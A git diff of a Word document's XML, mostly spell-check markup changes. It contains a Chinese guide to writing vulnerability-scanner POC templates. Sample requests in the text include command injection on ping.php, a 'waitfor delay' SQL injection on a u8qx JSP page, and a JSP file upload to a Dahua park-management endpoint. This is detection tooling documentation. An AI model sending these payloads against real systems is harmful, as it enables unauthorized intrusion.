               <w:rPr>
                 <w:color w:val="FF0000"/>
@@ -1876,6 +1936,7 @@
               </w:rPr>
               <w:t>able</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -2000,11 +2061,19 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t xml:space="preserve"> ,和s</w:t>
+              <w:t xml:space="preserve"> ,和</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>s</w:t>
             </w:r>
             <w:r>
               <w:t>tatus_code</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2140,7 +2209,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2244,8 +2313,23 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>在codition中，要以</w:t>
-      </w:r>
+        <w:t>在</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>codition</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>中，要以</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2253,6 +2337,7 @@
         </w:rPr>
         <w:t>json</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2383,7 +2468,21 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:t>判断延时时间，多用于sql延时注入</w:t>
+              <w:t>判断延时时间，多用于</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>sql</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>延时注入</w:t>
             </w:r>
             <w:r>
               <w:t>”</w:t>
@@ -2405,12 +2504,14 @@
             <w:r>
               <w:t>“</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t>status_code</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>”</w:t>
             </w:r>
@@ -2617,7 +2718,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2771,6 +2872,7 @@
         </w:rPr>
         <w:t>POC举例，下面是某个框架的命令执行漏洞，我们使其输出POC关键字</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2778,12 +2880,14 @@
         </w:rPr>
         <w:t>JustForTest</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>检测是否存在关键字，如是返回</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2791,6 +2895,7 @@
         </w:rPr>
         <w:t>JustForTest</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -2820,7 +2925,23 @@
             </w:pPr>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>POST /php/ping.php HTTP/1.1</w:t>
+              <w:t>POST /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>ping.php</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve"> HTTP/1.1</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2850,48 +2971,93 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t>Accept: application/json, text/javascript, */*; q=0.01</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:t>Accept-Encoding: gzip, deflate</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:t>Content-Type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:t>X-Requested-With: XMLHttpRequest</w:t>
-            </w:r>
+              <w:t>Accept: application/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>json</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>, text/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>javascript</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>, */*; q=0.01</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Accept-Language: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>zh-CN,zh;q</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Accept-Encoding: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>gzip</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>, deflate</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>Content-Type: application/x-www-form-</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>urlencoded</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>; charset=UTF-8</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">X-Requested-With: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2929,6 +3095,7 @@
             <w:r>
               <w:t xml:space="preserve">jsondata%5Btype%5D=99&amp;jsondata%5Bip%5D=echo </w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -2942,6 +3109,7 @@
               </w:rPr>
               <w:t>ustforTest</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2994,12 +3162,14 @@
             <w:r>
               <w:t xml:space="preserve">    "body": "</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
               <w:t>JustForTest</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>",</w:t>
             </w:r>
@@ -3011,7 +3181,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    "status_code": 200</w:t>
+              <w:t xml:space="preserve">    "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>status_code</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>": 200</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3103,7 +3281,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3206,7 +3384,35 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>测试sql延时注入的字段，以下poc示例，使服务器延时</w:t>
+        <w:t>测试</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>延时注入的字段，以下</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>poc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>示例，使服务器延时</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3243,7 +3449,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t>GET /u8qx/dialog_moreUser_check.jsp?mlid=';waitfor+delay+'0:0:</w:t>
+              <w:t>GET /u8qx/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>dialog_moreUser_check.jsp?mlid</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>=';waitfor+delay+'0:0:</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3272,7 +3486,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36</w:t>
+              <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>AppleWebKit</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3292,17 +3514,33 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t>Accept-Encoding: gzip, deflate</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
+              <w:t xml:space="preserve">Accept-Encoding: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>gzip</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>, deflate</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Accept-Language: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>zh-CN,zh;q</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>=0.9</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3363,7 +3601,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    "status_code": 200</w:t>
+              <w:t xml:space="preserve">    "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>status_code</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>": 200</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3405,7 +3651,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3469,6 +3715,7 @@
         </w:rPr>
         <w:t xml:space="preserve">.3 </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
@@ -3476,6 +3723,7 @@
         </w:rPr>
         <w:t>status_code</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
@@ -3515,7 +3763,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>顾名思义，判断网站状态码，在测试poc时对方网站是什么状态码就写什么</w:t>
+        <w:t>顾名思义，判断网站状态码，在测试</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>poc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>时对方网站是什么状态码就写什么</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -3558,7 +3820,15 @@
               <w:t xml:space="preserve">    </w:t>
             </w:r>
             <w:r>
-              <w:t>"status_code": 200</w:t>
+              <w:t>"</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>status_code</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>": 200</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3670,7 +3940,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId15"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3717,7 +3987,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3764,7 +4034,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4011,7 +4281,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4112,7 +4382,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    "status_code": 200</w:t>
+              <w:t xml:space="preserve">    "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>status_code</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>": 200</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4192,7 +4470,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4270,7 +4548,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    "status_code": 200</w:t>
+              <w:t xml:space="preserve">    "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>status_code</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>": 200</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -4334,8 +4620,16 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>，这里提供两个函数regex和json</w:t>
-      </w:r>
+        <w:t>，这里提供两个函数regex和</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4438,7 +4732,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4511,7 +4805,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4597,7 +4891,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>在json中使用正则表达式时会产生格式冲突，突然某一天，我脑子里出现了一种奇妙的想法，将正则表达式使用base64格式编码一下不就可以了？</w:t>
+        <w:t>在</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>中使用正则表达式时会产生格式冲突，突然某一天，我脑子里出现了一种奇妙的想法，将正则表达式使用base64格式编码一下不就可以了？</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4633,7 +4941,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -4703,7 +5011,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    "status_code": 200</w:t>
+              <w:t xml:space="preserve">    "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>status_code</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>": 200</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5039,7 +5355,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
+                    <a:blip r:embed="rId23"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -5132,7 +5448,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    "status_code": 200</w:t>
+              <w:t xml:space="preserve">    "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>status_code</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>": 200</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5413,8 +5737,13 @@
         </w:rPr>
         <w:t>大华智慧园区综合管理平台文件</w:t>
       </w:r>
-      <w:r>
-        <w:t>devicePoint_addImgIco文件上传</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>devicePoint_addImgIco</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>文件上传</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5459,7 +5788,23 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t>POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1</w:t>
+              <w:t>POST /</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>emap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>devicePoint_addImgIco?hasSubsystem</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>=true HTTP/1.1</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5519,7 +5864,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t>Accept-Encoding: gzip, deflate</w:t>
+              <w:t xml:space="preserve">Accept-Encoding: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>gzip</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>, deflate</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5652,7 +6005,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    "body": ".jsp",</w:t>
+              <w:t xml:space="preserve">    "body": ".</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>jsp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>",</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5668,7 +6029,35 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve"> "json": "jsp:data"</w:t>
+              <w:t xml:space="preserve"> "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>json</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>": "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>jsp:data</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5720,13 +6109,43 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t>GET /upload/emap/society_new/</w:t>
+              <w:t>GET /upload/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>emap</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>society_new</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>/</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>{{jsp}}</w:t>
+              <w:t>{{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>jsp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FF0000"/>
+              </w:rPr>
+              <w:t>}}</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> HTTP/1.1</w:t>
@@ -5769,18 +6188,47 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:t>Accept-Encoding: gzip, deflate, br, zstd</w:t>
-            </w:r>
+              <w:t xml:space="preserve">Accept-Language: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>zh-CN,zh;q</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Accept-Encoding: </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>gzip</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">, deflate, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>br</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>zstd</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -5913,7 +6361,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    "status_code": 200</w:t>
+              <w:t xml:space="preserve">    "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>status_code</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>": 200</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -5939,7 +6395,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>返回的json数据中，取出data键的值</w:t>
+        <w:t>返回的</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>数据中，取出data键的值</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5970,7 +6440,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25"/>
+                    <a:blip r:embed="rId24"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6022,7 +6492,15 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    "body": ".jsp",</w:t>
+              <w:t xml:space="preserve">    "body": ".</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>jsp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>",</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6038,7 +6516,35 @@
               <w:rPr>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t xml:space="preserve"> "json": "jsp:data"</w:t>
+              <w:t xml:space="preserve"> "</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
